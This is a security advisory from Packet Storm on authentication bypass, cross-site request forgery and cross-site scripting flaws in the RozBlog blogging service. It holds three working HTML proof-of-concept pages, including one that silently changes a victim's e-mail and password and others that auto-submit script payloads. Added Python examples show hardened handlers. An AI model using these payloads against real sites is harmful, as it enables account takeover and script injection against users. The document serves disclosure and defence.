RozBlog Weblog Service Cross Site Request Forgery / Cross Site Scripting

2016-02-24T00:00:00
ID PACKETSTORM:135922
Type packetstorm
Reporter Ehsan Hosseini
Modified 2016-02-24T00:00:00

Description

                                            `Document Title:  
===============  
RozBlog Weblog Service - Authentication Bypass / Cross Site Request Forgery / Cross Site Scripting
  
  
References (Source):  
====================  
http://ehsansec.ir/advisories/rozblog-xsrf-xss-bypass.txt  
  
  
Release Date:  
=============  
2016-02-23  
  
  
Product & Service Introduction:  
===============================  
RozBlog is one of the most popular blogging services; it offers many
special features that give you an interesting blogging experience.
  
  
Vulnerability Type:  
=========================  
Authentication Bypass  
Cross Site Request Forgery  
Cross Site Scripting  
  
Vulnerability Details:  
==============================  
I discovered an authentication bypass (the e-mail address can be changed
without the current password), a client-side cross site request forgery
vulnerability, and a cross site scripting vulnerability in RozBlog.com
(Weblog Service).
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
Medium  
  
  
  
  
Proof of Concept (PoC):  
=======================  
-- Cross Site Request Forgery & Authentication Bypass --  
  
-- PoC 1 --  
  
-- To change the e-mail address a user must normally first enter the old
password on a separate page; this exploit posts the profile form directly,
so the password check is never reached and is bypassed. --
  
<html>  
<head>  
<title>Authentication Bypass - Csrf</title>  
</head>  
<body>  
<form action="http://news.rozblog.com/Edit_Profile" method="post">  
<input type="text" name="email" value="hacker@mail.com" >  
<input type="text" name="name" value="Ehsan">  
<input type="text" name="age" value="10">  
<input type="text" name="site" value="http://ehsansec.ir/">  
<input type="text" name="country" value="Country">  
<input type="text" name="city" value="IRan">  
<input type="text" name="about" value="About User">  
<input type="text" name="yahoo" value="Yahoo Id">  
<input type="text" name="password" value="123@abc">  
<input type="submit" name="edit_profile" value="Attack">
</form>  
</body>  
</html>  
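The e-mail change above succeeds because the Edit_Profile endpoint takes the new address from any POST it receives: nothing binds the request to the victim's own page (no anti-CSRF token) and nothing proves the victim knows the current password (the `password` field in PoC 1 is an attacker-chosen new password, not the old one). The following is an added example, not RozBlog's code (the backend is not known); the `User` and `Session` classes, the `SITE_ORIGIN` value and the `csrf_token` / `current_password` field names are assumptions. It shows a handler with the behaviour PoC 1 relies on beside a hardened one, and drives both with the exact fields PoC 1 submits:

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

# Assumed origin of the profile page; PoC 1 posts to news.rozblog.com over http.
SITE_ORIGIN = "http://news.rozblog.com"


@dataclass
class User:
    """Constructed stand-in for a blog account (not RozBlog's data model)."""
    email: str
    salt: bytes
    pw_hash: bytes

    @classmethod
    def create(cls, email, password):
        salt = secrets.token_bytes(16)
        return cls(email, salt, cls._hash(password, salt))

    @staticmethod
    def _hash(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def check_password(self, password):
        return hmac.compare_digest(self._hash(password, self.salt), self.pw_hash)


@dataclass
class Session:
    """Server-side session. The token is generated once per session and embedded
    as a hidden field in the real profile form; a cross-site page cannot read it."""
    user: User
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


def edit_profile_vulnerable(session, form):
    """What PoC 1 relies on: any authenticated POST carrying an 'email' field
    rewrites the address. No token check, no current-password check."""
    session.user.email = form["email"]
    return 200, "profile updated"


def edit_profile_hardened(session, form, origin):
    # 1. Origin check: browsers attach the Origin header to cross-site POSTs
    #    and a page cannot forge it, so a form hosted elsewhere is refused.
    if origin != SITE_ORIGIN:
        return 403, "cross-site request rejected"
    # 2. Synchronizer token, compared in constant time.
    if not hmac.compare_digest(form.get("csrf_token", ""), session.csrf_token):
        return 403, "missing or invalid CSRF token"
    # 3. Re-authentication: changing the e-mail requires the *current* password.
    if not session.user.check_password(form.get("current_password", "")):
        return 403, "current password required to change e-mail"
    session.user.email = form["email"]
    return 200, "profile updated"


def demo():
    """Drive both handlers with the fields PoC 1 submits and with a legitimate
    same-origin request; returns the outcomes for inspection."""
    poc1 = {"email": "hacker@mail.com", "name": "Ehsan", "password": "123@abc"}

    s_vuln = Session(User.create("victim@example.com", "correct horse"))
    vuln_status, _ = edit_profile_vulnerable(s_vuln, poc1)

    s_hard = Session(User.create("victim@example.com", "correct horse"))
    # PoC 1 served from the attacker's page.
    csrf_status, _ = edit_profile_hardened(s_hard, poc1, origin="http://attacker.example")
    # Same fields but same-origin: still refused, no token and no current password.
    notoken_status, _ = edit_profile_hardened(s_hard, poc1, origin=SITE_ORIGIN)
    # Attacker guesses a token and reuses the new password as the current one.
    guess = dict(poc1, csrf_token="00" * 32, current_password="123@abc")
    guess_status, _ = edit_profile_hardened(s_hard, guess, origin=SITE_ORIGIN)
    # The victim's own form: real token, real current password.
    legit = {"email": "new@example.com", "csrf_token": s_hard.csrf_token,
             "current_password": "correct horse"}
    ok_status, _ = edit_profile_hardened(s_hard, legit, origin=SITE_ORIGIN)

    return {
        "vulnerable": (vuln_status, s_vuln.user.email),
        "cross_site": csrf_status,
        "no_token": notoken_status,
        "guessed": guess_status,
        "legit": (ok_status, s_hard.user.email),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The Origin check alone is not enough (older clients and some proxies strip the header), which is why the per-session token is the primary control; the password re-check is what closes the bypass the advisory reports, since a valid CSRF token only proves the request came from the victim's page, not that the victim intended an account-recovery-relevant change.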
  
-- PoC 2 --  
  
<html>  
<head>  
<title>XSS - Csrf</title>  
</head>  
<body onload="document.contactfrm.submit()">  
<form action="http://news.rozblog.com/Forum/Send/Message/"  
name="contactfrm" method="post">  
<input type="text" name="singer" value='"><img src=x onerror=alert(1)>'>  
<input type="text" name="subject" value='"><img src=x onerror=alert(2)>'>  
<input type="text" name="message" value='"></textarea><img src=x onerror=alert(3)>'>
</form>  
</body>  
</html>  
  
-- PoC 3 --  
  
-- Cross Site Scripting --  
  
-- For the action attribute, enter the address of a weblog or one of the rozblog.com domains --
  
<html>  
<head>  
<title>Cross Site Scripting</title>  
</head>  
<body onload="document.info.submit()">  
<form action='http://rozblog.com/View_Temp' method='POST'  
name='info'>  
<input name="c" id="c" value="2" type="hidden">  
<input name='themecode' value="<script>alert('Ehsan')</script>">  
</form>  
</body>  
</html>  
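PoC 2 and PoC 3 both work because user-supplied text is written back into the page unencoded: the `singer` and `subject` values break out of a quoted attribute with `">`, and the `message` value closes the enclosing `<textarea>` before its `<img>` payload. The following is an added example, not RozBlog's code; the reply-form template is assumed, since the forum's real markup is not shown in the advisory. It renders the PoC 2 payloads through a template that reflects them verbatim and through the same template with context-appropriate HTML encoding, and counts the tags that survive:

```python
import html
import re

# Constructed copies of the three payloads PoC 2 submits to Forum/Send/Message.
POC2 = {
    "singer":  '"><img src=x onerror=alert(1)>',
    "subject": '"><img src=x onerror=alert(2)>',
    "message": '"></textarea><img src=x onerror=alert(3)>',
}


def render_vulnerable(fields):
    """Reflects the three fields verbatim into the reply form, which is the
    behaviour PoC 2 depends on."""
    return (f'<input name="singer" value="{fields["singer"]}">\n'
            f'<input name="subject" value="{fields["subject"]}">\n'
            f'<textarea name="message">{fields["message"]}</textarea>')


def render_hardened(fields):
    """Same template, every value encoded for where it lands.
    html.escape(s, quote=True) turns & < > " ' into entities, so a value can
    neither close the quoted attribute it sits in nor open a tag; inside
    <textarea> the same encoding keeps </textarea> from ending the element.
    Note that attribute encoding only helps when the attribute is quoted."""
    def e(s):
        return html.escape(s, quote=True)
    return (f'<input name="singer" value="{e(fields["singer"])}">\n'
            f'<input name="subject" value="{e(fields["subject"])}">\n'
            f'<textarea name="message">{e(fields["message"])}</textarea>')


def count_start_tags(markup, name):
    """Number of start tags named `name` (case-insensitive) in the markup."""
    return len(re.findall(rf"<{name}\b", markup, re.I))


def count_end_tags(markup, name):
    """Number of end tags named `name` (case-insensitive) in the markup."""
    return len(re.findall(rf"</{name}\s*>", markup, re.I))


def demo():
    """Compare how many injected tags survive each renderer."""
    vuln, hard = render_vulnerable(POC2), render_hardened(POC2)
    return {
        "img_vulnerable": count_start_tags(vuln, "img"),        # 3: all payloads live
        "img_hardened": count_start_tags(hard, "img"),          # 0: encoded to &lt;img
        "textarea_close_vulnerable": count_end_tags(vuln, "textarea"),  # 2: one injected
        "textarea_close_hardened": count_end_tags(hard, "textarea"),    # 1: only the real one
    }


if __name__ == "__main__":
    print(render_hardened(POC2))
    print(demo())
```

The `themecode` parameter of PoC 3 is a different case: a theme preview exists to render submitted HTML, so encoding it would remove the feature. What makes PoC 3 exploitable is that anyone can cause that preview to render on a rozblog.com origin with an attacker-chosen body, so the fix there is to bind the preview request to the user's session with an anti-CSRF token, or to render previews on a separate sandbox origin where the script gains nothing, rather than to escape the parameter.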
  
  
Author:  
==================  
Ehsan Hosseini  
http://ehsansec.ir/  
  
Special thanks to:
===========  
Bl4ck_mohajem  
Alireza  
  
  
Contact:  
========  
hehsan979@gmail.com  
info@ehsansec.ir  
`